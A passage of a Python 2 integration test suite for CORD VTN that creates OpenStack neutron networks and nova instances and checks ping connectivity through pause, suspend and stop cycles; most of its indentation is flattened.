self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
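        # Suspend saves the instance state to disk and powers it off; connectivity
        # checks are expected to fail until the instance is resumed.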
new_instance_details.suspend()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_instance_details.resume()
        print 'Nova instance was suspended and resumed, now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_public_network_instance_with_stopping_and_starting_instances_and_checking_connectvity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management and public networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create a new nova instance on the management and public networks
        4. Validate that the new nova instance is created on the nova service
        5. Verify that ping from the compute node to the nova instance created in step 3 is successful
        6. Now stop the nova instance and check connectivity
        7. Now start the nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_32_net_management','vtn_test_32_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_32_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
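        # Stopping the instance shuts it down, so both connectivity checks are
        # expected to fail until the instance is started again.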
new_instance_details.stop()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_instance_details.start()
        print 'Nova instance was stopped and started, now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management and private networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create a new nova instance on the management and private networks
        4. Validate that the new nova instance is created on the nova service
        5. Verify that ping from the compute node to the nova instance created in step 3 is successful, while ping to an external host fails
"""
test_two_networks_name = ['vtn_test_33_net_management','vtn_test_33_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
instance_vm_name = 'vtn_test_33_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and private ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
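        # With only management and private networks attached, the instance has no
        # public connectivity, so the ping to an external host below is expected
        # to fail (status_2 asserted False) while the management ping succeeds.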
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, False)
def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_check_connectivity_to_other_instance(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management and private networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create two new nova instances on the management and private networks
        4. Validate that the new nova instances are created on the nova service
        5. Verify that ping from the compute node to the first nova instance created in step 3 is successful
        6. Verify that ping from one instance to the other instance over the private network is successful
"""
test_two_networks_name = ['vtn_test_34_net_management','vtn_test_34_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_34_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_34_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
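        # status_1: ping the first instance's management address from the compute
        # node; status_2: ssh into the second instance via its management address
        # and ping the first instance's private address from there
        # (check_type "Ping_from_source_tenant").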
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_with_and_without_pause_validating_connectivity_from_host_machine_or_compute_node_and_validating_connectivity_to_other_instance(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management and private networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create two new nova instances on the management and private networks
        4. Validate that the new nova instances are created on the nova service
        5. Verify that ping from the compute node and from the other instance to the first nova instance is successful
        6. Now pause one of the nova instances and check connectivity
        7. Now unpause the same nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_35_net_management','vtn_test_35_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_35_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_35_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_first_instance_details.pause()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_first_instance_details.unpause()
        print 'Nova instance was paused and unpaused, now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_and_doing_suspend_and_resume_validating_connectivity_from_host_machine_or_compute_node_and_validating_connectivity_to_other_instance(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management and private networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create two new nova instances on the management and private networks
        4. Validate that the new nova instances are created on the nova service
        5. Verify that ping from the compute node and from the other instance to the first nova instance is successful
        6. Now suspend one of the nova instances and check connectivity
        7. Now resume the same nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_36_net_management','vtn_test_36_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_36_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_36_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
        status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_first_instance_details.suspend()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_first_instance_details.resume()
        print 'Nova instance was suspended and resumed, now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_applying_stop_and_start_validating_connectivity_from_host_machine_or_compute_node_and_validating_connectivity_to_other_instance(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management and private networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create two new nova instances on the management and private networks
        4. Validate that the new nova instances are created on the nova service
        5. Verify that ping from the compute node and from the other instance to the first nova instance is successful
        6. Now stop one of the nova instances and check connectivity
        7. Now start the same nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_37_net_management','vtn_test_37_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_37_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_37_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_first_instance_details.stop()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_first_instance_details.start()
        print 'Nova instance was stopped and started, now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_two_private_network_with_each_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_check_connectivity_to_other_instance(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management network and two private networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create two new nova instances, one on each private network (both on the management network)
        4. Validate that the new nova instances are created on the nova service
        5. Verify that ping from the compute node to the first nova instance created in step 3 is successful
        6. Verify that ping from one instance to the other fails, since the two instances are on different private networks with no service dependency
"""
test_two_networks_name = ['vtn_test_39_net_management','vtn_test_39_netA_private','vtn_test_39_netB_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193'], ["private","10.160.161.192/26",'10.160.161.193']]
test_management_type = ["management_local", 'private','private']
first_instance_vm_name = 'vtn_test_39_nova_first_instance_management_netA'
second_instance_vm_name = 'vtn_test_39_nova_second_instance_management_netB'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,3):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(['vtn_test_39_net_management','vtn_test_39_netA_private'],nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(['vtn_test_39_net_management','vtn_test_39_netB_private'],nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[2]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
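        # The two instances sit on different private networks (netA and netB) and
        # no service dependency has been created between them, so the instance-to-
        # instance ping below is expected to fail (status_2 asserted False).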
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, False)
def test_cordvtn_service_dependency_without_xos_creating_mgmt_and_two_private_network_with_each_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_check_connectivity_to_other_instance(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management network and two private networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create two new nova instances, one on each private network (both on the management network)
        4. Validate that the new nova instances are created on the nova service
        5. Post a service dependency between the two private networks to ONOS
        6. Verify that ping from the compute node to the first nova instance is successful
        7. Verify that ping from one instance to the other is successful once the service dependency is in place
"""
